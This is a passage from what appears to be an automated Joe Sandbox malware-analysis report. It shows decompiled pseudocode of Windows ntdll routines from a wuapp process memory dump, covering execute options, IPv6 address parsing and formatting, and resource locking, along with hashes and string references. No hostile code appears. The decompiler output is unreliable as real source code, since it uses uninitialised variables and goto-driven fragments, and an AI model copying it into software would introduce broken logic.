                                                          					return E01F6E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                          				}
                                                          				L1:
                                                          				_t38 = 0;
                                                          				goto L2;
                                                          			}




























                                                          APIs
                                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01FB3F12
                                                          Strings
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01FBE2FB
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01FB3F4A
                                                          • ExecuteOptions, xrefs: 01FB3F04
                                                          • Execute=1, xrefs: 01FB3F5E
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01FB3EC4
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01FB3F75
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01FBE345
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: BaseDataModuleQuery
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 3901378454-484625025
                                                          • Opcode ID: 7362aa1d43bf7448c2cf6f8f2427e98455587a5ab4c2a09168062b546d21cad7
                                                          • Instruction ID: 57368d5baf924fa0482890204e713f8135764158fa3f6f19a854d6b946f8d003
                                                          • Opcode Fuzzy Hash: 7362aa1d43bf7448c2cf6f8f2427e98455587a5ab4c2a09168062b546d21cad7
                                                          • Instruction Fuzzy Hash: A641DC71A8030DBAEF20EA95DCC5FDA73BCAF54704F0405A9A505F6081EB72DA468FA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01FA0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				void* _t108;
                                                          				void* _t116;
                                                          				char _t120;
                                                          				short _t121;
                                                          				void* _t128;
                                                          				intOrPtr* _t130;
                                                          				char _t132;
                                                          				short _t133;
                                                          				intOrPtr _t141;
                                                          				signed int _t156;
                                                          				signed int _t174;
                                                          				intOrPtr _t177;
                                                          				intOrPtr* _t179;
                                                          				intOrPtr _t180;
                                                          				void* _t183;
                                                          
                                                          				_t179 = _a4;
                                                          				_t141 =  *_t179;
                                                          				_v16 = 0;
                                                          				_v28 = 0;
                                                          				_v8 = 0;
                                                          				_v24 = 0;
                                                          				_v12 = 0;
                                                          				_v32 = 0;
                                                          				_v20 = 0;
                                                          				if(_t141 == 0) {
                                                          					L41:
                                                          					 *_a8 = _t179;
                                                          					_t180 = _v24;
                                                          					if(_t180 != 0) {
                                                          						if(_t180 != 3) {
                                                          							goto L6;
                                                          						}
                                                          						_v8 = _v8 + 1;
                                                          					}
                                                          					_t174 = _v32;
                                                          					if(_t174 == 0) {
                                                          						if(_v8 == 7) {
                                                          							goto L43;
                                                          						}
                                                          						goto L6;
                                                          					}
                                                          					L43:
                                                          					if(_v16 != 1) {
                                                          						if(_v16 != 2) {
                                                          							goto L6;
                                                          						}
                                                          						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                          						L47:
                                                          						if(_t174 != 0) {
                                                          							E01F78980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                          							_t116 = 8;
                                                          							E01F6DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                          						}
                                                          						return 0;
                                                          					}
                                                          					if(_t180 != 0) {
                                                          						if(_v12 > 3) {
                                                          							goto L6;
                                                          						}
                                                          						_t120 = E01FA0CFA(_v28, 0, 0xa);
                                                          						_t183 = _t183 + 0xc;
                                                          						if(_t120 > 0xff) {
                                                          							goto L6;
                                                          						}
                                                          						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                          						goto L47;
                                                          					}
                                                          					if(_v12 > 4) {
                                                          						goto L6;
                                                          					}
                                                          					_t121 = E01FA0CFA(_v28, _t180, 0x10);
                                                          					_t183 = _t183 + 0xc;
                                                          					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                          					goto L47;
                                                          				} else {
                                                          					while(1) {
                                                          						_t123 = _v16;
                                                          						if(_t123 == 0) {
                                                          							goto L7;
                                                          						}
                                                          						_t108 = _t123 - 1;
                                                          						if(_t108 != 0) {
                                                          							goto L1;
                                                          						}
                                                          						_t178 = _t141;
                                                          						if(E01FA06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                          							if(E01FA06BA(_t135, _t178) == 0 || E01FA0A5B(_t136, _t178) == 0) {
                                                          								if(_t141 != 0x3a) {
                                                          									if(_t141 == 0x2e) {
                                                          										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                          											goto L41;
                                                          										} else {
                                                          											_v24 = _v24 + 1;
                                                          											L27:
                                                          											_v16 = _v16 & 0x00000000;
                                                          											L28:
                                                          											if(_v28 == 0) {
                                                          												goto L20;
                                                          											}
                                                          											_t177 = _v24;
                                                          											if(_t177 != 0) {
                                                          												if(_v12 > 3) {
                                                          													L6:
                                                          													return 0xc000000d;
                                                          												}
                                                          												_t132 = E01FA0CFA(_v28, 0, 0xa);
                                                          												_t183 = _t183 + 0xc;
                                                          												if(_t132 > 0xff) {
                                                          													goto L6;
                                                          												}
                                                          												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                          												goto L20;
                                                          											}
                                                          											if(_v12 > 4) {
                                                          												goto L6;
                                                          											}
                                                          											_t133 = E01FA0CFA(_v28, 0, 0x10);
                                                          											_t183 = _t183 + 0xc;
                                                          											_v20 = _v20 + 1;
                                                          											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                          											goto L20;
                                                          										}
                                                          									}
                                                          									goto L41;
                                                          								}
                                                          								if(_v24 > 0 || _v8 > 6) {
                                                          									goto L41;
                                                          								} else {
                                                          									_t130 = _t179 + 1;
                                                          									if( *_t130 == _t141) {
                                                          										if(_v32 != 0) {
                                                          											goto L41;
                                                          										}
                                                          										_v32 = _v8 + 1;
                                                          										_t156 = 2;
                                                          										_v8 = _v8 + _t156;
                                                          										L34:
                                                          										_t179 = _t130;
                                                          										_v16 = _t156;
                                                          										goto L28;
                                                          									}
                                                          									_v8 = _v8 + 1;
                                                          									goto L27;
                                                          								}
                                                          							} else {
                                                          								_v12 = _v12 + 1;
                                                          								if(_v24 > 0) {
                                                          									goto L41;
                                                          								}
                                                          								_a7 = 1;
                                                          								goto L20;
                                                          							}
                                                          						} else {
                                                          							_v12 = _v12 + 1;
                                                          							L20:
                                                          							_t179 = _t179 + 1;
                                                          							_t141 =  *_t179;
                                                          							if(_t141 == 0) {
                                                          								goto L41;
                                                          							}
                                                          							continue;
                                                          						}
                                                          						L7:
                                                          						if(_t141 == 0x3a) {
                                                          							if(_v24 > 0 || _v8 > 0) {
                                                          								goto L41;
                                                          							} else {
                                                          								_t130 = _t179 + 1;
                                                          								if( *_t130 != _t141) {
                                                          									goto L41;
                                                          								}
                                                          								_v20 = _v20 + 1;
                                                          								_t156 = 2;
                                                          								_v32 = 1;
                                                          								_v8 = _t156;
                                                          								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                          								goto L34;
                                                          							}
                                                          						}
                                                          						L8:
                                                          						if(_v8 > 7) {
                                                          							goto L41;
                                                          						}
                                                          						_t142 = _t141;
                                                          						if(E01FA06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                          							if(E01FA06BA(_t124, _t142) == 0 || E01FA0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                          								goto L41;
                                                          							} else {
                                                          								_t128 = 1;
                                                          								_a7 = 1;
                                                          								_v28 = _t179;
                                                          								_v16 = 1;
                                                          								_v12 = 1;
                                                          								L39:
                                                          								if(_v16 == _t128) {
                                                          									goto L20;
                                                          								}
                                                          								goto L28;
                                                          							}
                                                          						} else {
                                                          							_a7 = 0;
                                                          							_v28 = _t179;
                                                          							_v16 = 1;
                                                          							_v12 = 1;
                                                          							goto L20;
                                                          						}
                                                          					}
                                                          				}
                                                          				L1:
                                                          				_t123 = _t108 == 1;
                                                          				if(_t108 == 1) {
                                                          					goto L8;
                                                          				}
                                                          				_t128 = 1;
                                                          				goto L39;
                                                          			}


























                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: __fassign
                                                          • String ID: .$:$:
                                                          • API String ID: 3965848254-2308638275
                                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                          • Instruction ID: b659dbc28e6bd1dca249fec8a4b921084f6ac4e21f58826d9f1401d5c97f5b8b
                                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                          • Instruction Fuzzy Hash: E0A1C0B1D0030AEFDF25CF68E9556BEBBB4AF05304F64846AF802A7241DF3A9641CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 49%
                                                          			E01FA0554(signed int _a4, char _a8) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int* _t49;
                                                          				signed int _t51;
                                                          				signed int _t56;
                                                          				signed int _t58;
                                                          				signed int _t61;
                                                          				signed int _t63;
                                                          				void* _t66;
                                                          				intOrPtr _t67;
                                                          				signed int _t70;
                                                          				void* _t75;
                                                          				signed int _t81;
                                                          				signed int _t84;
                                                          				void* _t86;
                                                          				signed int _t93;
                                                          				signed int _t96;
                                                          				intOrPtr _t105;
                                                          				signed int _t107;
                                                          				void* _t110;
                                                          				signed int _t115;
                                                          				signed int* _t119;
                                                          				void* _t125;
                                                          				void* _t126;
                                                          				signed int _t128;
                                                          				signed int _t130;
                                                          				signed int _t138;
                                                          				signed int _t144;
                                                          				void* _t158;
                                                          				void* _t159;
                                                          				void* _t160;
                                                          
                                                          				_t96 = _a4;
                                                          				_t115 =  *(_t96 + 0x28);
                                                          				_push(_t138);
                                                          				if(_t115 < 0) {
                                                          					_t105 =  *[fs:0x18];
                                                          					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                          					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                          						goto L6;
                                                          					} else {
                                                          						__eflags = _t115 | 0xffffffff;
                                                          						asm("lock xadd [eax], edx");
                                                          						return 1;
                                                          					}
                                                          				} else {
                                                          					L6:
                                                          					_push(_t128);
                                                          					while(1) {
                                                          						L7:
                                                          						__eflags = _t115;
                                                          						if(_t115 >= 0) {
                                                          							break;
                                                          						}
                                                          						__eflags = _a8;
                                                          						if(_a8 == 0) {
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						} else {
                                                          							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                          							_t49 = _t96 + 0x1c;
                                                          							_t106 = 1;
                                                          							asm("lock xadd [edx], ecx");
                                                          							_t115 =  *(_t96 + 0x28);
                                                          							__eflags = _t115;
                                                          							if(_t115 < 0) {
                                                          								L23:
                                                          								_t130 = 0;
                                                          								__eflags = 0;
                                                          								while(1) {
                                                          									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                          									asm("sbb esi, esi");
                                                          									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020401c0;
                                                          									_push(_t144);
                                                          									_push(0);
                                                          									_t51 = E01F5F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                          									__eflags = _t51 - 0x102;
                                                          									if(_t51 != 0x102) {
                                                          										break;
                                                          									}
                                                          									_t106 =  *(_t144 + 4);
                                                          									_t126 =  *_t144;
                                                          									_t86 = E01FA4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                          									_push(_t126);
                                                          									_push(_t86);
                                                          									E01FB3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                          									E01FB3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                          									_t130 = _t130 + 1;
                                                          									_t160 = _t158 + 0x28;
                                                          									__eflags = _t130 - 2;
                                                          									if(__eflags > 0) {
                                                          										E01FE217A(_t106, __eflags, _t96);
                                                          									}
                                                          									_push("RTL: Re-Waiting\n");
                                                          									_push(0);
                                                          									_push(0x65);
                                                          									E01FB3F92();
                                                          									_t158 = _t160 + 0xc;
                                                          								}
                                                          								__eflags = _t51;
                                                          								if(__eflags < 0) {
                                                          									_push(_t51);
                                                          									E01FA3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                          									asm("int3");
                                                          									while(1) {
                                                          										L32:
                                                          										__eflags = _a8;
                                                          										if(_a8 == 0) {
                                                          											break;
                                                          										}
                                                          										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                          										_t119 = _t96 + 0x24;
                                                          										_t107 = 1;
                                                          										asm("lock xadd [eax], ecx");
                                                          										_t56 =  *(_t96 + 0x28);
                                                          										_a4 = _t56;
                                                          										__eflags = _t56;
                                                          										if(_t56 != 0) {
                                                          											L40:
                                                          											_t128 = 0;
                                                          											__eflags = 0;
                                                          											while(1) {
                                                          												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                          												asm("sbb esi, esi");
                                                          												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020401c0;
                                                          												_push(_t138);
                                                          												_push(0);
                                                          												_t58 = E01F5F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                          												__eflags = _t58 - 0x102;
                                                          												if(_t58 != 0x102) {
                                                          													break;
                                                          												}
                                                          												_t107 =  *(_t138 + 4);
                                                          												_t125 =  *_t138;
                                                          												_t75 = E01FA4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                          												_push(_t125);
                                                          												_push(_t75);
                                                          												E01FB3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                          												E01FB3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                          												_t128 = _t128 + 1;
                                                          												_t159 = _t158 + 0x28;
                                                          												__eflags = _t128 - 2;
                                                          												if(__eflags > 0) {
                                                          													E01FE217A(_t107, __eflags, _t96);
                                                          												}
                                                          												_push("RTL: Re-Waiting\n");
                                                          												_push(0);
                                                          												_push(0x65);
                                                          												E01FB3F92();
                                                          												_t158 = _t159 + 0xc;
                                                          											}
                                                          											__eflags = _t58;
                                                          											if(__eflags < 0) {
                                                          												_push(_t58);
                                                          												E01FA3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                          												asm("int3");
                                                          												_t61 =  *_t107;
                                                          												 *_t107 = 0;
                                                          												__eflags = _t61;
                                                          												if(_t61 == 0) {
                                                          													L1:
                                                          													_t63 = E01F85384(_t138 + 0x24);
                                                          													if(_t63 != 0) {
                                                          														goto L52;
                                                          													} else {
                                                          														goto L2;
                                                          													}
                                                          												} else {
                                                          													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                          													_push( &_a4);
                                                          													_push(_t61);
                                                          													_t70 = E01F5F970( *((intOrPtr*)(_t138 + 0x18)));
                                                          													__eflags = _t70;
                                                          													if(__eflags >= 0) {
                                                          														goto L1;
                                                          													} else {
                                                          														_push(_t70);
                                                          														E01FA3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                          														L52:
                                                          														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                          														_push( &_a4);
                                                          														_push(1);
                                                          														_t63 = E01F5F970( *((intOrPtr*)(_t138 + 0x20)));
                                                          														__eflags = _t63;
                                                          														if(__eflags >= 0) {
                                                          															L2:
                                                          															return _t63;
                                                          														} else {
                                                          															_push(_t63);
                                                          															E01FA3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                          															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                          															_push( &_a4);
                                                          															_push(1);
                                                          															_t63 = E01F5F970( *((intOrPtr*)(_t138 + 0x20)));
                                                          															__eflags = _t63;
                                                          															if(__eflags >= 0) {
                                                          																goto L2;
                                                          															} else {
                                                          																_push(_t63);
                                                          																_t66 = E01FA3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                          																asm("int3");
                                                          																while(1) {
                                                          																	_t110 = _t66;
                                                          																	__eflags = _t66 - 1;
                                                          																	if(_t66 != 1) {
                                                          																		break;
                                                          																	}
                                                          																	_t128 = _t128 | 0xffffffff;
                                                          																	_t66 = _t110;
                                                          																	asm("lock cmpxchg [ebx], edi");
                                                          																	__eflags = _t66 - _t110;
                                                          																	if(_t66 != _t110) {
                                                          																		continue;
                                                          																	} else {
                                                          																		_t67 =  *[fs:0x18];
                                                          																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                          																		return _t67;
                                                          																	}
                                                          																	goto L58;
                                                          																}
                                                          																E01F85329(_t110, _t138);
                                                          																return E01F853A5(_t138, 1);
                                                          															}
                                                          														}
                                                          													}
                                                          												}
                                                          											} else {
                                                          												_t56 =  *(_t96 + 0x28);
                                                          												goto L3;
                                                          											}
                                                          										} else {
                                                          											_t107 =  *_t119;
                                                          											__eflags = _t107;
                                                          											if(__eflags > 0) {
                                                          												while(1) {
                                                          													_t81 = _t107;
                                                          													asm("lock cmpxchg [edi], esi");
                                                          													__eflags = _t81 - _t107;
                                                          													if(_t81 == _t107) {
                                                          														break;
                                                          													}
                                                          													_t107 = _t81;
                                                          													__eflags = _t81;
                                                          													if(_t81 > 0) {
                                                          														continue;
                                                          													}
                                                          													break;
                                                          												}
                                                          												_t56 = _a4;
                                                          												__eflags = _t107;
                                                          											}
                                                          											if(__eflags != 0) {
                                                          												while(1) {
                                                          													L3:
                                                          													__eflags = _t56;
                                                          													if(_t56 != 0) {
                                                          														goto L32;
                                                          													}
                                                          													_t107 = _t107 | 0xffffffff;
                                                          													_t56 = 0;
                                                          													asm("lock cmpxchg [edx], ecx");
                                                          													__eflags = 0;
                                                          													if(0 != 0) {
                                                          														continue;
                                                          													} else {
                                                          														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                          														return 1;
                                                          													}
                                                          													goto L58;
                                                          												}
                                                          												continue;
                                                          											} else {
                                                          												goto L40;
                                                          											}
                                                          										}
                                                          										goto L58;
                                                          									}
                                                          									__eflags = 0;
                                                          									return 0;
                                                          								} else {
                                                          									_t115 =  *(_t96 + 0x28);
                                                          									continue;
                                                          								}
                                                          							} else {
                                                          								_t106 =  *_t49;
                                                          								__eflags = _t106;
                                                          								if(__eflags > 0) {
                                                          									while(1) {
                                                          										_t93 = _t106;
                                                          										asm("lock cmpxchg [edi], esi");
                                                          										__eflags = _t93 - _t106;
                                                          										if(_t93 == _t106) {
                                                          											break;
                                                          										}
                                                          										_t106 = _t93;
                                                          										__eflags = _t93;
                                                          										if(_t93 > 0) {
                                                          											continue;
                                                          										}
                                                          										break;
                                                          									}
                                                          									__eflags = _t106;
                                                          								}
                                                          								if(__eflags != 0) {
                                                          									continue;
                                                          								} else {
                                                          									goto L23;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L58;
                                                          					}
                                                          					_t84 = _t115;
                                                          					asm("lock cmpxchg [esi], ecx");
                                                          					__eflags = _t84 - _t115;
                                                          					if(_t84 != _t115) {
                                                          						_t115 = _t84;
                                                          						goto L7;
                                                          					} else {
                                                          						return 1;
                                                          					}
                                                          				}
                                                          				L58:
                                                          			}



































                                                          0x00000000
                                                          0x01f853d8
                                                          0x01f853e3
                                                          0x01f853ea
                                                          0x01f853ea
                                                          0x00000000
                                                          0x01f853d6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc22b6
                                                          0x00000000
                                                          0x01fc228f
                                                          0x01fc2349
                                                          0x01fc234d
                                                          0x01fc2251
                                                          0x01fc2251
                                                          0x00000000
                                                          0x01fc2251
                                                          0x01fc21a4
                                                          0x01fc21a4
                                                          0x01fc21a6
                                                          0x01fc21a8
                                                          0x01fc21ac
                                                          0x01fc21b6
                                                          0x01fc21b8
                                                          0x01fc21bc
                                                          0x01fc21be
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc21c0
                                                          0x01fc21c2
                                                          0x01fc21c4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc21c4
                                                          0x01fc21c6
                                                          0x01fc21c6
                                                          0x01fc21c8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc21c8
                                                          0x01fc21a2
                                                          0x00000000
                                                          0x01fc2183
                                                          0x01fa057b
                                                          0x01fa057d
                                                          0x01fa0581
                                                          0x01fa0583
                                                          0x01fc2178
                                                          0x00000000
                                                          0x01fa0589
                                                          0x01fa058f
                                                          0x01fa058f
                                                          0x01fa0583
                                                          0x00000000

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FC2206
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-4236105082
                                                          • Opcode ID: 1e2e7d757e5b11ed411a9cd0ff9cf84e15ee161c27fe81a806d824c5b69fb30c
                                                          • Instruction ID: 9c8f93b25f2c4916d04f159ba442ec2477f313aa36a488d5760fb75cdb6555bd
                                                          • Opcode Fuzzy Hash: 1e2e7d757e5b11ed411a9cd0ff9cf84e15ee161c27fe81a806d824c5b69fb30c
                                                          • Instruction Fuzzy Hash: A7511875B40203AFEB15DA19DCC0FA633AAEBD4B10F25421DFD45DB285DA27E8428790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 64%
                                                          			E01FA14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                          				signed int _v8;
                                                          				char _v10;
                                                          				char _v140;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t24;
                                                          				void* _t26;
                                                          				signed int _t29;
                                                          				signed int _t34;
                                                          				signed int _t40;
                                                          				intOrPtr _t45;
                                                          				void* _t51;
                                                          				intOrPtr* _t52;
                                                          				void* _t54;
                                                          				signed int _t57;
                                                          				void* _t58;
                                                          
                                                          				_t51 = __edx;
                                                          				_t24 =  *0x2042088; // 0x768eee31
                                                          				_v8 = _t24 ^ _t57;
                                                          				_t45 = _a16;
                                                          				_t53 = _a4;
                                                          				_t52 = _a20;
                                                          				if(_a4 == 0 || _t52 == 0) {
                                                          					L10:
                                                          					_t26 = 0xc000000d;
                                                          				} else {
                                                          					if(_t45 == 0) {
                                                          						if( *_t52 == _t45) {
                                                          							goto L3;
                                                          						} else {
                                                          							goto L10;
                                                          						}
                                                          					} else {
                                                          						L3:
                                                          						_t28 =  &_v140;
                                                          						if(_a12 != 0) {
                                                          							_push("[");
                                                          							_push(0x41);
                                                          							_push( &_v140);
                                                          							_t29 = E01F97707();
                                                          							_t58 = _t58 + 0xc;
                                                          							_t28 = _t57 + _t29 * 2 - 0x88;
                                                          						}
                                                          						_t54 = E01FA13CB(_t53, _t28);
                                                          						if(_a8 != 0) {
                                                          							_t34 = E01F97707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                          							_t58 = _t58 + 0x10;
                                                          							_t54 = _t54 + _t34 * 2;
                                                          						}
                                                          						if(_a12 != 0) {
                                                          							_t40 = E01F97707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                          							_t58 = _t58 + 0x10;
                                                          							_t54 = _t54 + _t40 * 2;
                                                          						}
                                                          						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                          						 *_t52 = _t53;
                                                          						if( *_t52 < _t53) {
                                                          							goto L10;
                                                          						} else {
                                                          							E01F62340(_t45,  &_v140, _t53 + _t53);
                                                          							_t26 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return E01F6E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                          			}





















                                                          APIs
                                                          • ___swprintf_l.LIBCMT ref: 01FCEA22
                                                            • Part of subcall function 01FA13CB: ___swprintf_l.LIBCMT ref: 01FA146B
                                                            • Part of subcall function 01FA13CB: ___swprintf_l.LIBCMT ref: 01FA1490
                                                          • ___swprintf_l.LIBCMT ref: 01FA156D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 1c4e4949140c87d54a2de4962470065201e5d04e8770c7bb0b51d6fd9796a3f5
                                                          • Instruction ID: 05003e0d1a4053648169921aa245d60a1d44ab866ea41c15444b68aeb939dd14
                                                          • Opcode Fuzzy Hash: 1c4e4949140c87d54a2de4962470065201e5d04e8770c7bb0b51d6fd9796a3f5
